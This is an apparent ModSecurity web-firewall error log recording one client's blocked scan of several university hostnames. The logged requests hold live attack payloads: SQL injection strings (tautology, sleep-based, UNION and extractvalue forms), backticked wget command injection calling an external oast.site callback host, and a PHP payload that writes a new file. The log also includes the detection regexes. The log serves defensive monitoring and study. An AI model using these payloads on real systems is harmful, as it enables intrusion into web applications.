[Tue Aug 29 11:34:52.320371 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATZp6YAAAAf"]
[Tue Aug 29 11:34:52.320946 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAASOUpIAAAAR"]
[Tue Aug 29 11:34:52.321427 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAASHh8wAAAAD"]
[Tue Aug 29 11:34:53.318522 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlguj9ncjn4o5tyt.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATus1UAAAAv"]
[Tue Aug 29 11:34:53.325391 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATPtSAAAAAM"]
[Tue Aug 29 11:34:53.348720 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgiom6so5naf5gt.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATlLFEAAAAq"]
[Tue Aug 29 11:34:53.352062 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAT@Kv0AAAA2"]
[Tue Aug 29 11:34:53.352525 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUDQTMAAAA7"]
[Tue Aug 29 11:34:53.360799 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAARjjXEAAAAL"]
[Tue Aug 29 11:34:53.367095 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAATVtScAAAAZ"]
[Tue Aug 29 11:34:53.369717 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAUbg08AAABQ"]
[Tue Aug 29 11:34:53.370433 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlg5afgjw4eqkphz.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAAUTiXwAAABJ"]
[Tue Aug 29 11:34:53.377484 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUR84EAAABI"]
[Tue Aug 29 11:34:53.379340 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATUxRIAAAAW"]
[Tue Aug 29 11:34:53.382976 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAUNakkAAABF"]
[Tue Aug 29 11:34:53.385038 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAULx8QAAABD"]
[Tue Aug 29 11:34:53.387004 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgsxr57wu3q9u9z.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATQXhkAAAAO"]
[Tue Aug 29 11:34:54.315215 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bsCo-f0AAATPtSIAAAAM"]
[Tue Aug 29 11:34:54.318962 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgctuuid1o4br5s.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bsCo-f0AAATmZd4AAAAr"]
[Tue Aug 29 11:34:54.340288 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bsCo-f0AAATlLFIAAAAq"]
[Tue Aug 29 11:34:54.342390 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bsCo-f0AAAUTiX4AAABJ"]
[Tue Aug 29 11:34:55.300540 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAUNaksAAABF"]
[Tue Aug 29 11:34:55.308005 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAATZp6sAAAAf"]
[Tue Aug 29 11:34:55.335937 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgdqiajt3m66g1i.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11b8Co-f0AAATUxRQAAAAW"]
[Tue Aug 29 11:34:55.381832 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAUKhAYAAABC"]
[Tue Aug 29 11:34:55.384670 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAT9PPEAAAA1"]
[Tue Aug 29 11:34:55.390776 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAULx8YAAABD"]
[Tue Aug 29 11:34:56.311614 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATfd38AAAAk"]
[Tue Aug 29 11:34:56.311616 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATlLFQAAAAq"]
